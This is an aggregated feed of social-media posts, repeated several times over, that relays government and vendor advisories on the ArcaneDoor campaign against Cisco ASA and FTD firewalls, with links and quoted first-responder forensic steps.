DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)
"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."
This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.
What you should do is (I'll quote):
- Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support
diagnostic-clicommand.- Use the
enablecommand to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.- Collect the outputs of the following commands:
show versionverify /SHA-512 system:memory/textdebug menu memory 8- Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.
Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.
I will repeat (without shouting this time):
Patching is not a fix!
"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."
There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.
#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity
Final question for anyone still reading: why the debug menu memory 8? What does it do?
I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:
cc: @todb @campuscodi @mttaggart @DaveMWilburn
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The #Cisco vulns today smack a little of the Barracuda ones last year.
I really hope we don't end at "Toss these ASAs into a volcano."
#CVE_2024_20353 #CVE_2024_20359
@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##Wake up babe, new Cisco actively exploited zero days just dropped:
Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.
See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak
See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart
Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:
cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #KnownExploitedVulnerabilitiesCatalog #CISA #UAT4356 #threatintel #IOC
##Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.
CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Cisco has released free software updates that address the vulnerability described in this advisory.
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities
Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory
Issue Summary
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.
Technical Key Findings
CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Vulnerable Products
Impact Assessment
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Patches or Workaround
Cisco has released free software updates that address the vulnerability described in this advisory.
Tags
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.
It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.
#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw
##The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.
As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.
www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353
Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.
If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.
blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359
Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs
#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV
##So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:
"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."
This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.
What you should do is (I'll quote):
- Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support
diagnostic-clicommand.- Use the
enablecommand to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.- Collect the outputs of the following commands:
show versionverify /SHA-512 system:memory/textdebug menu memory 8- Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.
Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.
I will repeat (without shouting this time):
"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."
There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.
#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity
Final question for anyone still reading: why the debug menu memory 8? What does it do?
I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:
cc: @todb @campuscodi @mttaggart @DaveMWilburn
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The #Cisco vulns today smack a little of the Barracuda ones last year.
I really hope we don't end at "Toss these ASAs into a volcano."
#CVE_2024_20353 #CVE_2024_20359
@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##Wake up babe, new Cisco actively exploited zero days just dropped:
Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.
See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak
See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart
Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:
cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #KnownExploitedVulnerabilitiesCatalog #CISA #UAT4356 #threatintel #IOC
##The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.
It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.
#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw
##The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.
As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.
www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353
Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.
If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.
blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359
Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs
#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV
##So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:
DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)
"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."
This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.
What you should do is (I'll quote):
- Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support
diagnostic-clicommand.- Use the
enablecommand to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.- Collect the outputs of the following commands:
show versionverify /SHA-512 system:memory/textdebug menu memory 8- Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.
Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.
I will repeat (without shouting this time):
Patching is not a fix!
"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."
There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.
#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity
Final question for anyone still reading: why the debug menu memory 8? What does it do?
I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:
cc: @todb @campuscodi @mttaggart @DaveMWilburn
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The #Cisco vulns today smack a little of the Barracuda ones last year.
I really hope we don't end at "Toss these ASAs into a volcano."
#CVE_2024_20353 #CVE_2024_20359
@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##Wake up babe, new Cisco actively exploited zero days just dropped:
Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.
See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak
See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart
Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:
cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #KnownExploitedVulnerabilitiesCatalog #CISA #UAT4356 #threatintel #IOC
##Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.
CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Cisco has released free software updates that address the vulnerability described in this advisory.
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities
Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory
Issue Summary
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.
Technical Key Findings
CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Vulnerable Products
Impact Assessment
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Patches or Workaround
Cisco has released free software updates that address the vulnerability described in this advisory.
Tags
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##Multiple government agencies has published an advisory on an ongoing APT campaign targeting Cisco ASA / FTD devices using post-auth RCE bug CVE-2024-20359 and CVE-2024-20358.
They don't know how the attackers initially got in.
Important note from the research published by Cisco Talos calling the APT operation* "ArcaneDoor":
> We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date. Our investigation is ongoing, and we will provide updates, if necessary, in the security advisories or on this blog.
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
##ArcaneDoor Attack (CVE-2024-20353 and CVE-2024-20359) https://fortiguard.fortinet.com/threat-signal-report/5429
##Hackers backdoored Cisco ASA devices via two zero-days (CVE-2024-20353, CVE-2024-20359) https://www.helpnetsecurity.com/2024/04/24/cve-2024-20353-cve-2024-20359/ #government-backedattacks #securityupdate #Don'tmiss #Microsoft #Hotstuff #firewall #0-day #Cisco #Lumen #News #CISA #NCSC
##@GossiTheDog Here are the CVE security advisories:
🚨🚨 two zero days in Cisco ASA AnyConnect under exploitation since last year
CVE-2024-20353 and CVE-2024-20359
##Multiple government agencies has published an advisory on an ongoing APT campaign targeting Cisco ASA / FTD devices using post-auth RCE bug CVE-2024-20359 and CVE-2024-20358.
They don't know how the attackers initially got in.
Important note from the research published by Cisco Talos calling the APT operation* "ArcaneDoor":
> We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date. Our investigation is ongoing, and we will provide updates, if necessary, in the security advisories or on this blog.
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
##@GossiTheDog Here are the CVE security advisories:
🚨🚨 two zero days in Cisco ASA AnyConnect under exploitation since last year
CVE-2024-20353 and CVE-2024-20359
##updated 2024-04-26T15:22:27.803000
50 posts
1 repos
The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.
It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.
#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw
##The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.
As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.
www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353
Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.
If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.
blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359
Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs
#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV
##So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:
"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."
This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.
What you should do is (I'll quote):
- Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support
diagnostic-clicommand.- Use the
enablecommand to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.- Collect the outputs of the following commands:
show versionverify /SHA-512 system:memory/textdebug menu memory 8- Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.
Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.
I will repeat (without shouting this time):
"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."
There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.
#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity
Final question for anyone still reading: why the debug menu memory 8? What does it do?
I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:
cc: @todb @campuscodi @mttaggart @DaveMWilburn
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The #Cisco vulns today smack a little of the Barracuda ones last year.
I really hope we don't end at "Toss these ASAs into a volcano."
#CVE_2024_20353 #CVE_2024_20359
@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##Wake up babe, new Cisco actively exploited zero days just dropped:
Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.
See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak
See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart
Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:
cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #KnownExploitedVulnerabilitiesCatalog #CISA #UAT4356 #threatintel #IOC
##The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.
It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.
#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw
##The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.
As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.
www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353
Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.
If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.
blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359
